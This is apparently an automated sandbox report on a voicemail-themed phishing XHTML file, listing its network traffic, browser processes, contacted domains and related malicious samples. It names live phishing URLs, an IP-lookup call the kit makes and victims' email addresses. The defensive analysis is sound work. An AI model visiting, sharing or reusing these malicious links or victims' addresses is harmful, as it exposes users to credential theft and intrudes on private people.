Source: unknown	Network traffic detected: HTTP traffic on port 60837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60841

Source: unknown	HTTPS traffic detected: 142.250.186.132:443 -> 192.168.2.24:60828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.24:60830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.174.100.20:443 -> 192.168.2.24:60831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.24:60833 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.24:60837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.24:60836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.193:443 -> 192.168.2.24:60838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.192.193:443 -> 192.168.2.24:60841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.24:60843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.24:60844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.168.138.190:443 -> 192.168.2.24:60846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.168.138.190:443 -> 192.168.2.24:60849 version: TLS 1.2

System Summary

HTML document with suspicious name

Source: Name includes: Play_VM-Now(bfrieden)VWAV.xhtml

Initial sample: play

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir4176_1819543230

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir4176_1819543230

Jump to behavior

Source: classification engine

Classification label: mal80.phis.winXHTML@22/23@26/12

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2004,i,8860473447837031108,2127390397510089652,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=2124 /prefetch:11
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Play_VM-Now(bfrieden)VWAV.xhtml"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2004,i,8860473447837031108,2127390397510089652,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=2124 /prefetch:11	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	1 Ingress Tool Transfer	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
https://avcbtech.site/muk/xwps.php	0%	Avira URL Cloud	safe
https://office.avcbtech.store/muk/xls/m1u2k.js?uid=bfrieden@cosb.org	0%	Avira URL Cloud	safe
https://sender.linxcoded.top/start/xls/includes/css6.css	0%	Avira URL Cloud	safe
file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
office.avcbtech.store	139.28.36.38	true	false	high
code.jquery.com	151.101.194.137	true	false	high
avcbtech.site	104.168.138.190	true	false	high
server1.linxcoded.top	185.174.100.76	true	false	unknown
www.google.com	142.250.186.132	true	false	high
api.ipify.org	104.26.13.205	true	false	high
s-part-0039.t-0009.t-msedge.net	13.107.246.67	true	false	high
sender.linxcoded.top	185.174.100.20	true	false	unknown
ipv4.imgur.map.fastly.net	199.232.196.193	true	false	high
i.imgur.com	unknown	unknown	false	high
_8254._https.server1.linxcoded.top	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://i.imgur.com/0HdPsKK.png	false		high
https://avcbtech.site/muk/xwps.php	true	Avira URL Cloud: safe	unknown
file:///C:/Users/user/Desktop/Play_VM-Now(bfrieden)VWAV.xhtml	true	Avira URL Cloud: safe	unknown
https://office.avcbtech.store/muk/xls/m1u2k.js?uid=bfrieden@cosb.org	false	Avira URL Cloud: safe	unknown
https://sender.linxcoded.top/start/xls/includes/css6.css	false	Avira URL Cloud: safe	unknown
https://i.imgur.com/KAb5SEy.png	false		high
https://code.jquery.com/jquery-3.1.1.min.js	false		high
https://api.ipify.org/?format=json	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/twbs/bootstrap/blob/master/LICENSE)	chromecache_52.1.dr	false		high
https://getbootstrap.com)	chromecache_52.1.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.184.196	unknown	United States	15169	GOOGLEUS	false
104.26.12.205	unknown	United States	13335	CLOUDFLARENETUS	false
185.174.100.20	sender.linxcoded.top	Ukraine	8100	ASN-QUADRANET-GLOBALUS	false
199.232.192.193	unknown	United States	54113	FASTLYUS	false
139.28.36.38	office.avcbtech.store	Ukraine	42331	FREEHOSTUA	false
199.232.196.193	ipv4.imgur.map.fastly.net	United States	54113	FASTLYUS	false
185.174.100.76	server1.linxcoded.top	Ukraine	8100	ASN-QUADRANET-GLOBALUS	false
104.168.138.190	avcbtech.site	United States	54290	HOSTWINDSUS	false
142.250.186.132	www.google.com	United States	15169	GOOGLEUS	false
151.101.194.137	code.jquery.com	United States	54113	FASTLYUS	false
104.26.13.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.24

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1640958
Start date and time:	2025-03-17 22:33:46 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Play_VM-Now(bfrieden)VWAV.xhtml
Detection:	MAL
Classification:	mal80.phis.winXHTML@22/23@26/12
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .xhtml

Warnings

Exclude process from analysis (whitelisted): SystemSettingsBroker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.110, 142.250.186.67, 142.250.181.238, 74.125.133.84, 172.217.16.206, 142.250.184.206, 216.58.206.42, 131.107.255.255, 216.58.206.46, 142.250.185.78, 142.250.184.238, 142.250.186.142, 172.217.18.14, 142.250.185.99, 142.250.185.238, 142.250.185.142, 142.250.184.195, 142.250.64.78, 173.194.7.38, 13.107.246.67
Excluded domains from analysis (whitelisted): accounts.google.com, ajax.googleapis.com, aadcdnoriginwus2.azureedge.net, clientservices.googleapis.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, dns.msftncsi.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, r1.sn-p5qddn76.gvt1.com, r1---sn-p5qddn76.gvt1.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.12.205	ue8Q3DCbNG.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	LauncherV9.exe	Get hash	malicious	LummaC Stealer	Browse	api.ipify.org/
	Catch Me If You Can (2002) 1080p.BluRay.x264.Full 744MB.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=xml
	NightFixed 1.0.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	VibeCall.exe	Get hash	malicious	RHADAMANTHYS	Browse	api.ipify.org/
	VRChat_ERP_Setup 1.0.0.msi	Get hash	malicious	Unknown	Browse	api.ipify.org/
	wEY98gM1Jj.ps1	Get hash	malicious	LummaC Stealer	Browse	api.ipify.org/
	oNvY66Z8jp.ps1	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Pmw24ExIdx.ps1	Get hash	malicious	Unknown	Browse	api.ipify.org/
	DeepLauncher.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
185.174.100.20	Play_VM-Now(eric.basil)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse
	ATT09858.htm	Get hash	malicious	HTMLPhisher	Browse
	https://keep.za.com/cgi//redirect.php#rbruening@elford.com	Get hash	malicious	HtmlDropper	Browse
	ATT-897850.htm	Get hash	malicious	HtmlDropper	Browse
	+11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msg	Get hash	malicious	HtmlDropper	Browse
	Play-Audio_Vmail_Ach Statement Credi....html	Get hash	malicious	HtmlDropper	Browse
	Play_VM.Now.matt.sibilo_Audio.wav...v.html	Get hash	malicious	HtmlDropper	Browse
	original (37).eml	Get hash	malicious	Unknown	Browse
	022 0.10.htm	Get hash	malicious	HTMLPhisher	Browse
199.232.192.193	Play_VM-Now(eric.basil)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse
	https://quilter.fineequiprnent.net/cyyksfewtebxpij/nspderlqsumnd/Zzlfycybzhhctwe89g0xmsc/uztzgkmaolipwp/qvxwpsequug/connor.allen/wvqtiwhatdb/quilter.com/clzcbcvcepgd8	Get hash	malicious	HTMLPhisher	Browse
	https://2ig5kgwiett8w7e9ev.blogspot.com/	Get hash	malicious	HTMLPhisher	Browse
	https://pub-a75ffa45639b4a91a804d5a002f48c9d.r2.dev/signs.html	Get hash	malicious	HTMLPhisher	Browse
	http://gift50steam.com/50	Get hash	malicious	Unknown	Browse
	1.ps1	Get hash	malicious	RHADAMANTHYS	Browse
	https://u.to/LZkkIg	Get hash	malicious	Unknown	Browse
	aXeuKjNXAK.ps1	Get hash	malicious	RHADAMANTHYS	Browse
	https://mailtrack.io/l/602b7f5905dfb2b7053f69bb1ad3f5e5fe2093ad?url=https%3A%2F%2Fbusinessaccounts-suite.com&u=12237839&signature=92845e946510e802#user_email=m.alarcon@servihabitat.com&fname=Mireia&lname=Alarcon	Get hash	malicious	Unknown	Browse
	https://crypt.single-sign-on.password.land/Xd3QvSWJuTlhiVW04UGxPbkxoejhHVU80SU05YXVvd2Q1ZnhDMFVkN2RYQnRPM00wZ1ZhT0xuR3l5d2NvbW9vME00MURTS1lmdEwwSmdwcEtLaTJSZFpkbDd3dnJGVmdCcUNzMngxN2NOOTd0ZHhHZTJaQzN2K1ZtZ0NBanJFQXFYQk5MU2ZBT2VteUtFTkVubWtHYkVLNkNncmJpUnBOL3RLWXp2N25BTUltZ0RGcUViZnExV3pYY3BlN2kwOGhHd2hrYnR0MmVPME1pMlpCWG9PQ0JVd1RvMWd2Mi0tK2NtTUtPVmpHMWdhOENYQi0tNFkxM1RaaTIxS0pqSVk4MHhlWGFUZz09?cid=2442051797	Get hash	malicious	KnowBe4	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
code.jquery.com	437cb98f-02e6-3095-7a14-f6ed0fcbd9b6.eml	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.130.137
	Play Voicemail Transcription. (387.KB).svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.2.137
	Play_VM-Now(eric.basil)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	https://analytics.zoho.com/open-view/3062125000000006086	Get hash	malicious	Unknown	Browse	151.101.194.137
	https://u17065553.ct.sendgrid.net/ls/click?upn=u001.Rw-2FXpvWBRDxNoiEvv-2B0VhMl349dE-2BIxYKCLpL5-2B-2FL8px39hmRTYxAZ-2BeMH1CR7jYvsg3f7mQR-2BtgzEdpv6rWDyoEa1Isq60WafIaat9IMqfozrbRuGiDhSD5zRfw1vSUnaPfHOkeKVWyjmgPghsIl-2FnSiz3vjd-2BgNdZNW1WWi7RlhTni8jQbV4O1UkQOa0-2F2VYGlXOPUclqMwRi50Vl1PR4j2jhVrjOnUdA6E03jJF3YxTMCgxElFH-2Bjnu2oS6ZdGJGXf9TKr37Eh3pnVym0G5ilxnSN6bJyz-2FWbi47cL6vQDH-2FLX6HDdsxLQr4OiWNyplfwZIjGldJH3Oj3k-2B0Sr92pyHOs07I3QG9CN9BFC52s0blv8XoiBzACqb7MDZTgdhgx-2Fj3fdHjRUqn0E0aUxawEH-2F-2B7SQiAWk4bi4jHEXI-3DlKA5_AMa9RrBWZfrIG11ZEW0ArF1BRI9e8rcrPZr5T9DlZ7Ba2ZAvuJPwiS8cX4aFrXjFerUDwGcfFdNk6Ly7G30W-2FpJZ3vwwQM6aCBocvejnros7-2FYckwVQH02a6C13hCOZXCH6DxRozn9HOBenC-2BdqPCIwBV1vvkSKYyJjB4wo2MVyi5b4Ko6F9xhTiwowhGgTSo1JEnvhUu4BAFpCuBdmsFw-3D-3D	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.2.137
	http://email.shop2.wonderpark.my/c/eJwUyk1uhSAQAODTwJIM8wPzFiy68R4KYzX1iRHTprdvuv9aiRbTDN5KzIyIokp-K7YirKlWzVWAeRFKVVflF5OpSvJ7QUABijkKKVBgihmqGWBeYGnsGMbWLww__Wx2X_P9Fd6__ijb81zD0YfDyeFk80tZKK9iUJtASjaTNA2LnWO_eqj97XDyd7EWtv45n6OfjqHeNp5jP23rjx3jn_nvgn8BAAD__y9yPWo	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.66.137
	2450856955_.svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.130.137
	https://www.languagesim.com/interpretationterms/	Get hash	malicious	Unknown	Browse	151.101.2.137
	https://u17065553.ct.sendgrid.net/ls/click?upn=u001.Rw-2FXpvWBRDxNoiEvv-2B0VhGNZUddqwhjRz7Y3aH-2F1iEXujVcSjMM7CY7q30axNIjPtSPwVANtpwkARse71YbTG6hv5YyKcZ3EG9czO3tuqWXIHvFV-2FdtzTRYY9DFBEvbC0MnWDkjPffSjdhbZvMXBG-2Fbl-2F1JQalpy10ZBTpuDmJw8qtDG1RR-2FO-2Bzqy6Ryg-2BIXW6P-2FRmEE7JdIRaCncCouVLTVsWciZPEjkoHD7BDf7qzUctKE-2Fuov9RtCNiCQmJmwXCDa5dDgefQoLRKRDmR4vQ-3D-3DKnfO_4-2BCeSnTfNElQaOz0iIYXcY63TczAP34ghOtoTraLSwoOLAyQYuLOf75Ty99J50dacfCtsIK1GZvxQM45z1qBFZ9wseL0KuFhELugADtC7G-2Bvzzdi1qvZkAsCG7tQfhZagkro3woJV3MTqoQy1rs8sT0Ut5uYpsrniDcVKn6MJEnCWRsblRYyJRkv-2BYtQV-2BKUm1WYOzDqDkYxny3kQFWCbISNT8xpoE2o-2BIn1-2FK5Ue8M-3D	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.194.137
	https://www.languagesim.com/interpretationterms/	Get hash	malicious	Unknown	Browse	151.101.2.137
s-part-0039.t-0009.t-msedge.net	Emarine System Contact Update.pdf	Get hash	malicious	HTMLPhisher	Browse	13.107.246.67
	https://forms.office.com/e/CzYzGKsuJ0h0Qz9CdMLPYe0NavsKbyZ12uW0kP6	Get hash	malicious	HTMLPhisher	Browse	13.107.246.67
	New order 242.xls	Get hash	malicious	Unknown	Browse	13.107.246.67
	https://sp-track.info.socialmaud.digital/api/v1/track/click/355/30046/17/default/6b7d5c97-8b19-4c41-b355-64ecd84af44a?redirecturl=https://gamma.app/docs/POM-Technologies-Proposal-1tjhhormn8i5mpb	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	13.107.246.67
	https://vwj9ymusjv9xeh65cf602u2rmsnkbyf2u7lxtnawlaim1gvceu.moydow.de/5417971987/6327230191/#bnBkL3NmdW9mZGJvYnlmdUFob2p0Ymlkc3ZxJTBsU3RkM0cwdnMvbmJmeXN1VGZ1ekMvezJsdWZxUFhXV0wyNVRmOXZqWkk5eUZbbXJie04xTTZIREp2cGN5dTlRMzplOFZkVEQwMDt0cXV1aQ==	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	13.107.246.67
	sBvrNv0wtb.exe	Get hash	malicious	Hancitor	Browse	13.107.246.67
	Compliance KnowBe4 courses .xlsx	Get hash	malicious	KnowBe4	Browse	13.107.246.67
	HAWKE ORDER 12.3.2025.pdf (#U007e135 KB).xls	Get hash	malicious	Unknown	Browse	13.107.246.67
	SWIFT COPY.xls	Get hash	malicious	Unknown	Browse	13.107.246.67
	SWIFT COPY.xls	Get hash	malicious	Unknown	Browse	13.107.246.67
avcbtech.site	ATT09858.htm	Get hash	malicious	HTMLPhisher	Browse	104.168.138.190
api.ipify.org	Cv8saT11Ha.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	Play_VM-Now(eric.basil)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205
	I281zhTj3J.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	EoN1VzwYYa.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	LHU6yozPyx.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	SOA - HUAFENG (JAN INVOICE OVERDUE).exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	New requirement Orders.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	ue8Q3DCbNG.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	eR2hECroRD.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	K9PwdfoVnG.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
office.avcbtech.store	Play_VM-Now(eric.basil)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	ATT09858.htm	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	ATT99718.htm	Get hash	malicious	Unknown	Browse	139.28.36.38

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	SecuriteInfo.com.Win32.PWSX-gen.11507.25552.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	https://upbring.org/foster-training-calendar	Get hash	malicious	Unknown	Browse	104.16.117.116
	437cb98f-02e6-3095-7a14-f6ed0fcbd9b6.eml	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.26.0.100
	Play Voicemail Transcription. (387.KB).svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.21.41.104
	0a0#U00a0.js	Get hash	malicious	RHADAMANTHYS	Browse	172.64.41.3
	original (2).eml	Get hash	malicious	Unknown	Browse	104.21.13.45
	http://gamma.app	Get hash	malicious	Unknown	Browse	104.18.86.42
	original (1).eml	Get hash	malicious	Unknown	Browse	104.21.27.77
	https://office.internalportal.net/XZ3hrdWFDVElydnJXMFN0VkVPcnRLQkVhenUyUlhTSFA4eEpFN3lPV1FpR0tnak1mV1M4T0xUMUJZUXgzMHFIbk1GengzZ1hyKyszM1QwcjRPSm5HYzNjZ2VwVlVrUGdtS1hqU0xNdU9sMmFYc0cyMENTWHRxT3l4aG5kZGRldG02QXlhdkcyQ3pieVRHUVVLWWk3enlDSE5HenR3aDBjQVJibnFUcWJGektJMk1iblhYTDBvMUIzRUlkakZJSFBmRDVDWmVqeG5FRFZucEhzMHd4MDhIQm89LS1aOUtiSTV6UTBxeDZYZWp3LS1pWjA3eGgyY2kwNjgvWVlUd0hibVJnPT0=?cid=2438021603	Get hash	malicious	KnowBe4	Browse	104.18.91.62
	https://check.xemyrai6.icu/gkcxv.google?i=3755074e-f8fb-4a7a-b690-776492d909a4%20#%20''I%20am%20not%20a%20robot%20-%20%D0%A1%D0%90%D0%A0%D0%A2%D0%A1%D0%9D%D0%90%20Verification%20ID:738948''	Get hash	malicious	Unknown	Browse	188.114.96.3
ASN-QUADRANET-GLOBALUS	Play_VM-Now(eric.basil)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse	185.174.100.76
	mips.elf	Get hash	malicious	Unknown	Browse	104.245.241.64
	arm5.elf	Get hash	malicious	Unknown	Browse	104.245.241.64
	Transferencia - BBVA 20250312.pdf(45KB).com.exe	Get hash	malicious	DarkTortilla, XWorm	Browse	104.245.240.123
	http://znhejdjbhiggcd.ossassessoria.com.br/4diZRA13374FbeN829lfsavaefhd2PDVVMSBOIIGVJMI4000TICW2208542O12?gMiA13bo9PEo5	Get hash	malicious	Unknown	Browse	194.53.137.131
	Presupuesto - N#U00ba 270 - 0020250314-0000945.com.exe	Get hash	malicious	Remcos, DarkTortilla	Browse	104.245.240.123
	m68k.elf	Get hash	malicious	Mirai	Browse	23.153.78.255
	https://vexti.com/punchss/bowlls	Get hash	malicious	Unknown	Browse	104.245.240.188
	https://email.mail.likolia.com/c/eJxM0D2O2zAQxfHTiB2NGXL4MQWLNL7GYsghYyKyJGiVBTanD-xq6_9rfk-O42NqgcQjkjZbIbIlTc5yC2xDQGapybFTowVGIFdNL5gIEyNDNo8SexTUphrH6MojC3qqzOR9EuBqZnHgAnh0GCBAvnEFx0Sa-wjaMS8ET5nrbZ1_9nXKre1Ps5bHdR2fi_-1uPvi7v_kXd9xcXdsjmJlokE---CBmSrlwU0wsHSz7dccs8k19-1FzJkgduyWhkNL3mfLMVQ7GqWYK0IANccq3_18zYWzJBxgqXe0VNFbYRo2IIqIahrozFlk07PfvuTv78e2EGiT9l37-RZ89k0_rvn8cVcyX8X9DwAA__8Ts2t8	Get hash	malicious	Unknown	Browse	104.238.60.95
	cbr.sh4.elf	Get hash	malicious	Mirai	Browse	45.199.228.216
FREEHOSTUA	Play_VM-Now(eric.basil)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	ATT09858.htm	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	ATT99718.htm	Get hash	malicious	Unknown	Browse	139.28.36.38
	armv5l.elf	Get hash	malicious	Unknown	Browse	193.42.104.40
	xd.mips.elf	Get hash	malicious	Mirai	Browse	193.42.104.85
	firmware.armv5l.elf	Get hash	malicious	Unknown	Browse	185.13.5.61
	http://micr.tech-arnericas.com	Get hash	malicious	Fake Captcha, HTMLPhisher	Browse	139.28.37.60
	https://rickhome.com/secuure	Get hash	malicious	Fake Captcha, Phisher	Browse	139.28.37.144
	jXBjxhHQgR.exe	Get hash	malicious	CMSBrute	Browse	176.107.176.31
	https://eu-west-1.protection.sophos.com/?d=keysurgical.de&u=aHR0cHM6Ly93d3cua2V5c3VyZ2ljYWwuZGUvSG9tZS9TZWxlY3RMYW5ndWFnZT9sYW5ndWFnZT1lbi1VUyZyZWRpcmVjdFVybD1odHRwczovL2VuZXJncmVlbi5ycy8ud2VsbC1rbm93bi9hY21lLWNoYWxsZW5nZS8=&p=m&i=NjEwYjE2Y2U0Zjc0MWMwZTk2MmNlZjk5&t=OE0wZTk1N0Y5dDJ6N29CQlM3RlRxNW5DbXpKbTRqcWJzeTE0UnZUZXJyTT0=&h=ccb3dc1d93924e5398cb784943bcbc84&s=AVNPUEhUT0NFTkNSWVBUSVaHyS6hqym7qLqtAI_LAX_uaGik92MJH8on0iF38froOA	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
FASTLYUS	437cb98f-02e6-3095-7a14-f6ed0fcbd9b6.eml	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.2.137
	Play Voicemail Transcription. (387.KB).svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.2.137
	original (1).eml	Get hash	malicious	Unknown	Browse	199.232.210.172
	T3-03-17.bat	Get hash	malicious	Braodo	Browse	185.199.108.133
	Play_VM-Now(eric.basil)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	https://blgwlnauto.com/kylefax/faxdocuments.html	Get hash	malicious	HTMLPhisher	Browse	151.101.129.140
	https://analytics.zoho.com/open-view/3062125000000006086	Get hash	malicious	Unknown	Browse	151.101.194.137
	sniatsr.zip	Get hash	malicious	Unknown	Browse	151.101.129.91
